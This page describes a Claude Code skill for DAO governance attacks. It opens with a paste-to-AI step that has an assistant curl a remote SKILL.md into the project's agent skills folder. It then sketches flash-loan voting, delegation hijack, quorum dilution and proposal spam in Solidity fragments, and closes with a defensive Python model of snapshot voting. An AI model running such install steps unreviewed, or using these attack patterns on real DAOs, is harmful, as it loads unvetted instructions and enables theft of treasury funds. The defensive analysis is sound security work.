Install
Copy this and paste it into Claude Code, Cursor, or any AI assistant:
I want to install the "contracts-governance-attack" skill in my project. Please run this command in my terminal:

```shell
# Install skill into your project
mkdir -p .claude/skills/governance-attack && curl --retry 3 --retry-delay 2 --retry-all-errors -o .claude/skills/governance-attack/SKILL.md "https://raw.githubusercontent.com/PurpleAILAB/Decepticon/main/packages/decepticon/decepticon/skills/standard/contracts/governance-attack/SKILL.md"
```

Then restart Claude Code (or reload the window in Cursor) so the skill is picked up.
Description
DAO governance attack — flash-loan-backed vote manipulation, delegation hijack, quorum dilution, proposal-spam DoS, time-lock bypass via emergency multisig, snapshot vs. on-chain vote desync, Compound/Aave/Uniswap-style GovernorBravo abuse.
1. Flash-loan-backed vote
DAOs that grant voting power = current token balance (not a snapshot of past balance) are vulnerable:

```solidity
// Attack: borrow governance token, vote, return loan, all in one tx
function attack() external {
    // 1. Flash-borrow gov tokens
    IFlashLoan(aave).flashLoan(address(this), govToken, 1_000_000e18, "");
}

function executeOperation(...) external {
    // 2. Vote on the malicious proposal
    governor.castVote(proposalId, 1); // 1 = for
    // 3. Repay loan + premium (automatic by flash-loan callback)
}
```

This is what happened to Beanstalk (April 2022, $182M loss) — attacker flash-borrowed Beanstalk gov tokens, voted to drain the treasury, repaid the loan. Same block.

Defense check: Does `getVotes(address, blockNumber)` reference a past snapshot? If yes (Compound's GovernorBravo pattern, OZ Governor with ERC20Votes + `getPastVotes`), the flash-loan vote doesn't work.
2. Delegation hijack
ERC20Votes lets users delegate. If a contract holds gov tokens and delegates to itself, controlling that contract = controlling the votes.

```solidity
// If the target DAO has a contract holding tokens that delegates to itself,
// and that contract is upgradeable/has an admin function:
upgradeableContract.upgradeAndCall(newImpl, abi.encodeWithSelector(redelegate.selector, attacker));
// Now attacker controls those votes.
```
3. Quorum dilution attack
If quorum = % of total supply (not % of currently-active voters), an attacker can mint or stake extra tokens to push quorum out of reach:

```solidity
// Some DAOs base quorum on totalSupply()
// Attacker mints a bunch of tokens to themselves (via legit minting if they're a holder)
// Quorum requirement now too high for real voters to meet → all proposals fail
```
4. Proposal spam DoS
GovernorBravo has a proposalThreshold. If it is low, an attacker spams proposals to:

- Burn proposers' gas
- Confuse the UI
- Push real proposals out of the active window
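The defense check at the end of section 1, the quorum point in section 3 and the proposalThreshold in section 4 all come down to one mechanism: the Governor must read checkpointed values at a snapshot block, never live state. The following is an added example, not code from this SKILL.md and not OpenZeppelin's or Compound's implementation; it is a small Python model of the ERC20Votes checkpoint + Governor snapshot pattern. The class names `VotesToken` and `SnapshotGovernor`, the 4% quorum, the 1,000-token threshold and the accounts and amounts in `scenario()` are all constructed for illustration. It shows that tokens borrowed and returned within one block inflate `get_votes` but contribute zero weight through `get_past_votes`, that a mint after the snapshot does not move the quorum bar, and that a same-block balance cannot satisfy the proposal threshold.

```python
from bisect import bisect_right


class Checkpoints:
    """Append-only (block, value) history, like ERC20Votes' _checkpoints."""
    def __init__(self):
        self.hist = []  # (block, value) pairs, blocks non-decreasing
    def latest(self):
        return self.hist[-1][1] if self.hist else 0
    def push(self, block, value):
        if self.hist and self.hist[-1][0] == block:  # same-block writes collapse
            self.hist[-1] = (block, value)
        else:
            self.hist.append((block, value))
    def at(self, block):  # value as of the end of `block`; 0 before the first checkpoint
        i = bisect_right(self.hist, (block, float("inf")))
        return self.hist[i - 1][1] if i else 0


class VotesToken:
    """Minimal ERC20Votes-style token: balances, delegation, checkpointed votes (constructed)."""
    def __init__(self):
        self.balance, self.delegatee, self.votes = {}, {}, {}
        self.total_supply = Checkpoints()
    def _cp(self, who):
        return self.votes.setdefault(who, Checkpoints())
    def _move(self, src, dst, amount, block):
        for who, sign in ((src, -1), (dst, 1)):
            if who is not None:
                self._cp(who).push(block, self._cp(who).latest() + sign * amount)
    def delegate(self, who, to, block):
        old, self.delegatee[who] = self.delegatee.get(who), to
        self._move(old, to, self.balance.get(who, 0), block)
    def mint(self, to, amount, block):
        self.balance[to] = self.balance.get(to, 0) + amount
        self.total_supply.push(block, self.total_supply.latest() + amount)
        self._move(None, self.delegatee.get(to), amount, block)
    def transfer(self, src, dst, amount, block):
        if self.balance.get(src, 0) < amount:
            raise ValueError("insufficient balance")
        self.balance[src] -= amount
        self.balance[dst] = self.balance.get(dst, 0) + amount
        self._move(self.delegatee.get(src), self.delegatee.get(dst), amount, block)
    def get_votes(self, who):  # live value: the number a flash loan inflates
        return self._cp(who).latest()
    def get_past_votes(self, who, block):  # snapshot value: what a Governor should read
        return self._cp(who).at(block)


class SnapshotGovernor:
    """Reads votes, quorum and proposal threshold at snapshot blocks, never live state (constructed)."""
    def __init__(self, token, quorum_pct=4, proposal_threshold=1_000, voting_delay=1):
        self.token, self.quorum_pct, self.proposals = token, quorum_pct, {}
        self.proposal_threshold, self.voting_delay = proposal_threshold, voting_delay
    def propose(self, pid, proposer, block):
        # Threshold is read one block back, so tokens obtained in this block cannot buy a proposal slot.
        if self.token.get_past_votes(proposer, block - 1) < self.proposal_threshold:
            raise PermissionError("below proposal threshold")
        self.proposals[pid] = {"snapshot": block + self.voting_delay, "for": 0, "voted": set()}
    def cast_vote(self, pid, voter, support, block):
        p = self.proposals[pid]
        if block <= p["snapshot"] or voter in p["voted"]:
            raise ValueError("voting not open or already voted")
        weight = self.token.get_past_votes(voter, p["snapshot"])  # never get_votes(voter)
        p["voted"].add(voter)
        p["for"] += weight if support else 0
        return weight
    def quorum(self, pid):
        # Fraction of total supply *at the snapshot*: a mint after the snapshot cannot move the bar.
        snap = self.proposals[pid]["snapshot"]
        return self.token.total_supply.at(snap) * self.quorum_pct // 100


def scenario():
    """Constructed timeline: honest holders, an undelegated pool, a flash-borrower, a late mint."""
    t = VotesToken()
    for who, amt in (("alice", 10_000), ("bob", 5_000), ("proposer", 1_000)):
        t.delegate(who, who, block=1)
        t.mint(who, amt, block=1)
    t.mint("pool", 100_000, block=1)  # the pool never delegates, so it carries no votes
    g = SnapshotGovernor(t)
    g.propose("p1", "proposer", block=10)  # snapshot = block 11
    # Block 12: pool tokens borrowed, self-delegated, vote cast, tokens returned.
    t.transfer("pool", "attacker", 100_000, block=12)
    t.delegate("attacker", "attacker", block=12)
    live = t.get_votes("attacker")
    counted = g.cast_vote("p1", "attacker", True, block=12)
    t.transfer("attacker", "pool", 100_000, block=12)
    # Block 12: a large mint after the snapshot; the quorum stays pinned to snapshot supply.
    t.mint("whale", 1_000_000, block=12)
    live_quorum = t.total_supply.latest() * g.quorum_pct // 100
    g.cast_vote("p1", "alice", True, block=13)
    return {"live": live, "counted": counted, "quorum": g.quorum("p1"),
            "live_quorum": live_quorum, "reached": g.proposals["p1"]["for"] >= g.quorum("p1")}
```

Call `scenario()` to get the contrast in one dict: the borrower's live votes are 100,000 but the counted weight is 0; the snapshot quorum is 4,640 while a live-supply quorum after the mint would be 44,640, so Alice's 10,000 votes still reach it. When reviewing a real Governor, the equivalent check is whether vote weight comes from `getPastVotes(voter, proposalSnapshot)` and quorum from `getPastTotalSupply(snapshot)`, which is what OpenZeppelin's GovernorVotes and GovernorVotesQuorumFraction do, and whether the proposal threshold is evaluated against a past block rather than the proposer's current balance.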